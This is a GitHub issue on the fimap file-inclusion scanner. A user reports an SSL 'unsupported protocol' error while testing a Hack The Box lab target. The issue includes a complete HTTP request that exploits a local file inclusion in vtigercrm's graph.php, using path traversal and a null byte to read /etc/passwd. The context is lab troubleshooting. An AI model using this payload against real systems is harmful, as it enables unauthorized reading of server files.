kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0

SSL: Unsupported_Protocol #87

Open JustOneMoreDog opened 5 years ago

JustOneMoreDog commented 5 years ago

This URL has a known LFI, but I am unable to get fimap to bypass the SSL check. I am still diving into the code to try to figure this out, but figured I should let you know about it.

root@kalix64:~/htb/beep# fimap -u https://10.10.10.7/vtigercrm/graph.php?current_language=
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'https://10.10.10.7/vtigercrm/graph.php?current_language='
[19:16:08] [OUT] Inspecting URL 'https://10.10.10.7/vtigercrm/graph.php?current_language='...
[19:16:08] [INFO] Fiddling around with URL...
[19:16:08] [WARN] <urlopen error [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)>
Target URL isn't affected by any file inclusion bug :(

I took a look at https://www.stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl and tried modifying the mainClass.py, crawler.py, and browser.py files to match, but could not get it past that error.

This is what the LFI request looks like if executed manually:

GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1
Host: 10.10.10.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: testing=1; PHPSESSID=n9arcpjr1g8eecov6pd43c8q67; elastixSession=4q0k0i9lqq64fka4g20pkof643
Upgrade-Insecure-Requests: 1

I am not entirely sure if fimap will be able to do this LFI, since it has a filter in the form of %00&module=Accounts&action needing to be appended to the request. I do not think fimap supports filters? Regardless, it's still an awesome tool and I love it.